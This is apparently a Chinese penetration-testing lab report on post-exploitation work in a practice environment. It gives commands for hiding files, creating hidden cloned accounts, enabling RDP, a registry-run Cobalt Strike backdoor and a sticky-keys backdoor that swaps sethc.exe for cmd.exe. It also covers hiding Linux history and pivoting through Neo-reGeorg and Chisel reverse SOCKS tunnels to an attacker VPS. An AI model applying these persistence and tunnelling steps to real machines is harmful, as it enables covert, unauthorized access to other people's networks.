1、完成文件隐cang并使用sharpshadowuser创建隐cang账号实验

1)利用文件属性隐cang文件
真正隐cang⽂件:使⽤Attrib +s +a +h +r命令,把原本的⽂件增加了系统⽂件属性、存档⽂件属性、只读⽂件属性和隐cang⽂件属性。
attrib +s +a +h +r 文件名
这样就做到了真正的隐cang,不管你是否显示隐cang⽂件,在此⽂件夹内都看不⻅。
attrib 命令如果不加参数(attrib +s +a +h +r),则会影响当前⽬录下全部⽂件。
如何恢复⽂件?
attrib -s -a -h -r
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

隐cang账号可查阅ShadowUser
在这里插入图片描述
在这里插入图片描述使用cs中的sharpshadowuser也可以创建隐cang账号,注意win7靶场的administrator账号没有激活,因此克隆administrator账号创建成功也无法登录。
在这里插入图片描述

下图是创建账号成功的回显,在这里插入图片描述

接下来我们远程登录mstsc,输入登录信息,连接成功
在这里插入图片描述
注意,不是绝对100%隐cang,如果对方也要使用计算机,我们不要登录,否则,对方将会看到下图信息
在这里插入图片描述
或者看到下图
在这里插入图片描述

在这里插入图片描述

手动执行命令开启:
#设置远程桌⾯端⼝

reg add "HKLM\System\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f

#开启远程桌⾯

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

#检查端⼝状态

netstat -an|find "3389"

#关闭远程桌⾯

wmic RDTOGGLE W

#- -或者使用cs插件开启RDP和关闭等等

上面使用sharpshadowuser是克隆账号,下面命令是完全新建账号在这里插入图片描述

2、利用cs创建开启启动项后men进行权限维持并手动创建粘滞键后men
首先cs生成一个mu马(有效载荷可执行程序),upload至c:\windows\Temp\目录下。接着添加注册表启动项
在这里插入图片描述

在这里插入图片描述

点击RegAdd添加注册表启动项。我们退出原会话,重新启动会⾃动运⾏后⻔程序,可以看到cs端新上线。

粘滞键后men啊,粘滞键sethc.exe⽂件位置c:\windows\system32\sethc.exe
默认情况下sethc.exe是属于TrustedInstaller所有,不管是普通⽤户还是administrator都没有权限对它进⾏编辑的。TrustedInstaller是⼀个安全机制,权限⽐administrator管理权⾼,但⽐system低。所以,我们第一步,
使用cs提升权限至system,提权后执行下列命令。因为下列命令需要具备system权限,管理员权限无法执行

move sethc.exe sethc1.exe #将原本的sethc改名为sethc1
copy cmd.exe sethc.exe #将cmd复制并重命名为sethc

此时连按五次shift键即可启动cmd,⽽且不需要登录就可以执行。
在这里插入图片描述

3、完成linux隐cang历史命令和隐cang文件权限实验

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

4、掌握Neo-reGeorg、Chisel和cs的bean自带socks5功能使用
在这里插入图片描述
我们使用渗透机中的Neo-reGeorg,执行命令

python3 neoreg.py generate -k <your_password>

会在同目录下neoreg_servers文件夹中生成的一些脚本文件,我们将生成的脚本 tunnel.php (依实际情况而定的文件类型,不一定是.php)上传到代理服务器的网站根目录,访问http://<代理服务器ip>/tunnel.php,会看到如下图在这里插入图片描述
在这里插入图片描述
接着,我们在neoreg中执行另一条命令

python3 neoreg.py -k <上一步使用的密码> -u http://192.168.145.128/tunnel.php

浏览器配置网络代理为socks5协议的 127.0.0.1:1080,即可访问代理服务器内网,如下图在这里插入图片描述

chisel啊。下载适合操作系统的二进制文件。推荐使用版本 1.7.7,因为它兼容旧版 Windows 系统。如需最新功能可选择 1.9.1 或更高版本https://github.com/jpillora/chisel/releases
正向连接:隧道⼊⼝开在客户端上,服务端相当于出⼝。由于服务端在⾁鸡上,如果有防⽕墙拦截,则⽆法使⽤。把chisel文件上传到服务端(肉鸡win7),服务器端启动命令chisel server --p 8088
在这里插入图片描述
客户端连接命令

./chisel client SERVER_IP:8088 LOCAL_PORT:TARGET_IP:TARGET_PORT

成功(浏览器直接连接,没有启用代理)
在这里插入图片描述
在这里插入图片描述

反向连接啊。反隧道⼊⼝开在服务端上,客户端相当于出⼝,可以规避防⽕墙拦截
服务器端启动命令chisel server -p 8088 --reverse
客户端连接命令chisel client SERVER_IP:8088 R:REMOTE_PORT:TARGET_IP:TARGET_PORT
成功(浏览器直接连接,没有启用代理)
在这里插入图片描述

socks5啊,使用cs的bean。
上⾯两种⽅式只能代理某个端⼝,如何能代理全部端⼝呢?可以采⽤SOCKS5代理
#注意防火墙,服务端临时允许端口,powershell管理员权限运行

New-NetFirewallRule -DisplayName "Chisel_Port_12345" -Direction Inbound -Protocol TCP -LocalPort 12345 -Action Allow

接下来在vps服务器(渗透虚拟机上)上启动

chisel server -p 12345 --socks5 --reverse 

在win7(肉鸡)启动
chisel.exe client <服务器ip>:12345 R:1080:socks在这里插入图片描述

渗透虚拟机配置代理为socks5协议的 127.0.0.1:1080后,可以随意访问内⽹服务

5、完成Proxifier 代理fscan进行内网漏dong扫描实验
还是下图的情况,我们先关闭浏览器配置的代理
在这里插入图片描述
proxifier配置代理服务器
在这里插入图片描述
配置代理规则
在这里插入图片描述
我们启用fscan扫描内网
在这里插入图片描述

Logo

有“AI”的1024 = 2048,欢迎大家加入2048 AI社区

更多推荐